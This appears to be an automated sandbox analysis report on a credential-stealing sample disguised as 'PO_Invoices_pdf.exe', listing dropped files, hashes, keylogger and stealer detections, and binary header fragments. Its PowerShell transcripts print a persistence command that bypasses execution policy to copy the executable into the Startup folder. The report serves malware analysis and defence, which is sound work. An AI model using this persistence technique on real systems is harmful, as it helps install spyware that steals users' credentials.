                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fla1cgxx.qbm.ps1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zllqa32j.uf3.psm1
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:very short file (no magic)
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1
                                                                                                  Entropy (8bit):0.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:U:U
                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                  Malicious:false
                                                                                                  Preview: 1
                                                                                                  C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):532992
                                                                                                  Entropy (8bit):6.507156751280516
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:DufqM5JXbS/QTjhUqBfxrwEnuNcSsm7IoYGW0VvBXCAt6kihwE+VDpJYWmlwnx9E:uJXQtqB5urTIoYWBQk1E+VF9mOx9Ei
                                                                                                  MD5:FFDB58533D5D1362E896E96FB6F02A95
                                                                                                  SHA1:D6E4A3CA253BFC372A9A3180B5887C716ED285C6
                                                                                                  SHA-256:B3D02FD5C69293DB419AC03CDF6396BD5E7765682FB3B2390454D9A52BA2CA88
                                                                                                  SHA-512:3AE6E49D3D728531201453A0BC27436B1A4305C8EF938B2CBB5E34EE45BB9A9A88CF2A41B08E4914FDA9A96BBAA48BD999A2D2F1DFFCD39761BB1F3620CA725F
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Arnim Rupp
                                                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: Joe Security
                                                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, Author: JPCERT/CC Incident Response Group
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 96%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious, Browse
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................4........... ........@.. ....................................@.....................................O.... ...2...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....2... ...2..................@..@.reloc.......`....... ..............@..B........................H.......0}..\..............X...........................................2s..........*....0...........~......(......~....o....~....o..........9.......~....o.........+G~.....o......o........,)...........,.~.....~.....o....o.......................1.~.....~....o......o.....~....~....o....o......~.....(....s....o..........(.........*...................0.. .........(....(..........(.....o......*....................(......(.......o.......o.......o.......o......*.R..(....o....o......
                                                                                                  C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2
                                                                                                  Entropy (8bit):1.0
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                  Malicious:false
                                                                                                  Preview: ..
                                                                                                  C:\Users\user\AppData\Local\Temp\origigoods20.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):220672
                                                                                                  Entropy (8bit):6.057903449485828
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:SVQEat7UY8MnZGcqB5AyruUJ7XAzsNvEaEifv6yr9zRsc0qC4B0BUAE3vVAVvoUB:SytJqCUyQNX36yQqbB063cAUAW
                                                                                                  MD5:61DC57C6575E1F3F2AE14C1B332AD2FB
                                                                                                  SHA1:F52F34623048E5FD720E97A72EEDFD32358CD3A9
                                                                                                  SHA-256:1C7757EE223F2480FBC478AE2ECAF82E1D3C17F2E4D47581D3972416166C54AB
                                                                                                  SHA-512:81A7DB927F53660D3A04A161D5C18AAB17D676BCC7AE0738AB786D9BEE82B91016E54E6F70428AEC4087961744BE89B1511F9E07D8DABBE5C2A9D836722395A1
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 86%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious, Browse
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.................V...........t... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................t......H.........................................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                                                                                                  C:\Users\user\AppData\Local\Temp\origigoods40.exe
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):221696
                                                                                                  Entropy (8bit):6.060343577776758
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:K9Wf3ouEAkhUxOCt+qqr3drw0tR5dUimnoSA7Mw4lY2hWYQQgGJrozRscS4+SOw6:KhuI3dlxUOt7IdWLOjCDUjU
                                                                                                  MD5:AE36F0D16230B9F41FFECBD3C5B1D660
                                                                                                  SHA1:88AFC2923D1EEFB70BAD3C0CD9304949954377EF
                                                                                                  SHA-256:CFAD1E486666FF3FB042BA0E9967634DE1065F1BBD505C61B3295E55705A2A50
                                                                                                  SHA-512:1E98AEE7DC693822113DCDE1446A5BED1C564B76EEF39F39F3A5D98D7D2099CF69AC92717A3297AFC7082203929F1E9437F21CB6BC690974A0EF6D6CF6E4393C
                                                                                                  Malicious:true
                                                                                                  Yara Hits:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, Author: Joe Security
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 43%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: Orders.exe, Detection: malicious, Browse
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`.................X..........>v... ........@.. ....................................@..................................u..S.......P............................................................................ ............... ..H............text...DV... ...X.................. ..`.rsrc...P............Z..............@..@.reloc...............`..............@..B................ v......H...........H.............................................................(....*..(....*.s.........s.........s.........s.........*...0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0..,.........+......,........,........,.+.+.~....o....*.0............+......,........,........,.+.+...(....(....*...0..(.........+......,........,........,.+.+..(....*.0..,.......
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1655808
                                                                                                  Entropy (8bit):7.9413063895946845
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:49152:MWHaK9/4HLz1lxNIFSCLulcJVzF+gr6b0XVULw:v6KirHxNPUVO0FULw
                                                                                                  MD5:59D7D8D5DD3E0055E7C0DCC75897F569
                                                                                                  SHA1:B249B28D088D54E971E2D9D8B2688440F8E6D513
                                                                                                  SHA-256:EF715CD322F0A805A68840B215C062F2E254977170A11C6800D836EAC781FABB
                                                                                                  SHA-512:79EBC2A128D018EB7E71B254FDD2FA72DEAE18081F1732619046E1DB9D1AEE92F7529521C005A5F861275AFCBDA3A39FD304CD5E1A49DF848675460C5CF8F30D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                  • Antivirus: ReversingLabs, Detection: 20%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`..............0......D......N.... ... ....@.. ....................................@.....................................W.... ...A........................................................................... ............... ..H............text...T.... ...................... ..`.rsrc....A... ...B..................@..@.reloc...............B..............@..B................0.......H...................*....9..............................................&...}....*&...}....*&...}....*...#........}.....#........}......}....*..s....z..#........}.....#........}......}.....(.....*.(/........~....~....o....o...........*..s....}......}.....(.......((....*6.~....(....&*&...}....*:..r...p(.....*:..r...p(.....*:..r...p(.....*:..r...p(.....*:..r...p(.....*:..r...p(.....*:..r...p(.....*:..r!..p(.....*:..r%..p(.....*:..r...p(.....*:..r)..p(.....**...(.....**...(.....
                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe:Zone.Identifier
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):26
                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                  Malicious:true
                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                  C:\Users\user\AppData\Roaming\pid.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4
                                                                                                  Entropy (8bit):1.5
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Ezn:Ezn
                                                                                                  MD5:7A2347D96752880E3D58D72E9813CC14
                                                                                                  SHA1:1D3027412B106008F1A8094D747616D37F4AE1BB
                                                                                                  SHA-256:90F285F8FB15C8BC72A43D25CEA803491CC0FD0E97567CFF577A2CFA56CDE6F8
                                                                                                  SHA-512:96A7B7BE0B89097FC65BB75DD9B8B0DEB5063ED6990E27151A0A7E54C899AE69377E57ECB5728DFFAB657EE444244F833236F80EC6A98E449902DF9075C74ECE
                                                                                                  Malicious:false
                                                                                                  Preview: 5440
                                                                                                  C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\hawkgoods.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):50
                                                                                                  Entropy (8bit):4.6483674395583785
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:oNerbJSRE2J5xAI4F:oNe0i23f8
                                                                                                  MD5:0CE4A330E42C174E8E8CF4D81C6F46A6
                                                                                                  SHA1:D9CA3AD5CD90643DF99808D5FF0EC0E89E891FE0
                                                                                                  SHA-256:94ABDE13F36EBE4B4AC81A712597439918788FD90339594FA1DDD679E7DAD70A
                                                                                                  SHA-512:CE3453726B73A7423C69D94E4784966A6AA08381ABE9585AA323D0D80FAF63B3A31508B7083C3FEC6AB2727112573733D498F4F78389D75F64DDF6BABE581943
                                                                                                  Malicious:false
                                                                                                  Preview: C:\Users\user~1\AppData\Local\Temp\hawkgoods.exe
                                                                                                  C:\Users\user\Documents\20210202\PowerShell_transcript.830021.dnDUrXav.20210202085254.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4005
                                                                                                  Entropy (8bit):5.389111464999469
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZ0x6KNWwkqDo1ZSzwMZ06KNWwkqDo1ZCSdC3UC3UW3gZ8:wXO
                                                                                                  MD5:38990FC46C9A4B38D38D5B6B446DA280
                                                                                                  SHA1:6BAB83EC68E0E3232CCB544F489D69026F3FAB9C
                                                                                                  SHA-256:5CF4E546B058149AC9BBAA1B3B2CB29FFDC75EA82CFF37F287D818A567B0476B
                                                                                                  SHA-512:821C9C1FE957904DCCB563AB386978D98D5DF5A6DBF5EF196B3C2DB2DA74BF0D4784195B36CFA8C8A3AF4748FFEDFA5B3EA8359E322BDFE39477EDDCA372B8B4
                                                                                                  Malicious:false
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210202085355..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'..Process ID: 6908..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210202085355..**********************..PS>Copy-Item 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.e
                                                                                                  C:\Users\user\Documents\20210202\PowerShell_transcript.830021.vpu_jBUU.20210202085147.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1217
                                                                                                  Entropy (8bit):5.237238445417744
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:BxSAIdZOvBdaD+x2DOXCgxluVM5wWOHjeTKKjX4CIym1ZJX+luVM5lnxSAZa:BZHv6KoO/uojOqDYB1Zouo5ZZa
                                                                                                  MD5:D400773C1D3FF7015F2BCC822734162A
                                                                                                  SHA1:299A9A913AEFDF415CB5515F9A09B05161264DEF
                                                                                                  SHA-256:37EBF08DC01B50660C9218D9FB98992D216DE77186933DC3E016B003328F07DF
                                                                                                  SHA-512:B221B385406A51229AF6D022D209DDFE86BEA4DFF6E183B790307C18CDBE4C71633FD794C8AF13BBF825416732F6B38BBEE356F43D3D9C8DC384780BD5F5492F
                                                                                                  Malicious:false
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210202085211..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 830021 (Microsoft Windows NT 10.0.17134.0)..Host Application: Powershell.exe -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe'..Process ID: 5904..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210202085211..**********************..PS>Copy-Item 'C:\Users\user\Desktop\PO_Invoices_pdf.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.ex
                                                                                                  C:\Users\user\Documents\Matiex Keylogger\Screenshot.png
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\Matiexgoods.exe
                                                                                                  File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4898647
                                                                                                  Entropy (8bit):7.944487996146186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:98304:6HSa5z1aE+hDBoHSa5z1aE+hD2eHSa5z1aE+hD2eHSa5z1aE+hD2eHSa5z1aE+h/:nkz3Ckz3dkz3dkz3dkz3akz3W
                                                                                                  MD5:8C4D34A23BB01B274B0281197BAD0E4C
                                                                                                  SHA1:AC9D537B161FCC2DEB326716CC499029D67A1EBD
                                                                                                  SHA-256:0B756492D0BA32BC2DB803986371A08AA9A5D6A46C859E3CA7204D12D1CBB123
                                                                                                  SHA-512:509D9D5D2A1F8EEBCC39D5568E5875635C4D3C78552539270F96894230246EB1ADD6021A202043DE1605F4BB70E3AF16DC741240253C7499C24FEFD3BE865582
                                                                                                  Malicious:false
                                                                                                  Preview: .PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mGY.....__@.)..=t..y.. .....'.....A:R.$!.@z%.B.-....J...B...).R@Hg......;k.].....u}...)...{.g.l..=.-.........==kw.....e..~3bm.{.q..Zv.O.];v.o...{........cB:.+e....A.@.....l....vv."...Sv.5....]..X......Y.]...0~..#..c'......og.kc!k./h'.m...b..e..-HWG..U)]..2#.......^..g.vw.l..]...'.k.b.lz...c<.....oF.s!CR...a.{z......b@;%.zf.{+b..y!g...;.sw[......Q..>C.vv>.c...&>...7<........hm..7k{.V.=3...){>..b...=.4..f/{=.@.=..C.....d.$6q~.A....-....vo......w.n...O............!.;H9......w.........]..ac.Pvv.Q....bc*..........7...........S.W?..y."6.E}e.W.H?.Bm;X..,-..........i..dN.2r.S..h%....'..........7?3.c.@.p...)N.YL.!P.[..y..3e..E.T.o.......f.....g.Q.[..=....@}.Gr....@.}:V.`.+.0..|C.............!.;H9......w.........N.bc.P.\....Z`i......c...Z?.}T......J..g[.m..{..e...a..p.`...z...?!....0..psl..(.*.;.....N..`..........`.D.LjO'.....b.[p2..%"....-..b.?..q.\.....1.

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.9413063895946845
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  File name:PO_Invoices_pdf.exe
                                                                                                  File size:1655808
                                                                                                  MD5:59d7d8d5dd3e0055e7c0dcc75897f569
                                                                                                  SHA1:b249b28d088d54e971e2d9d8b2688440f8e6d513
                                                                                                  SHA256:ef715cd322f0a805a68840b215c062f2e254977170a11c6800d836eac781fabb
                                                                                                  SHA512:79ebc2a128d018eb7e71b254fdd2fa72deae18081f1732619046e1db9d1aee92f7529521c005a5f861275afcbda3a39fd304cd5e1a49df848675460c5cf8f30d
                                                                                                  SSDEEP:49152:MWHaK9/4HLz1lxNIFSCLulcJVzF+gr6b0XVULw:v6KirHxNPUVO0FULw
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............0......D......N.... ... ....@.. ....................................@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:d0d2f8ccf6c4dad8

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x591c4e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                  Time Stamp:0x601882D9 [Mon Feb 1 22:38:17 2021 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x191bf40x57.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1920000x4186.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1980000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000x18fc540x18fe00False0.788759670991data7.94835272626IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0x1920000x41860x4200False0.507634943182data5.48483136325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
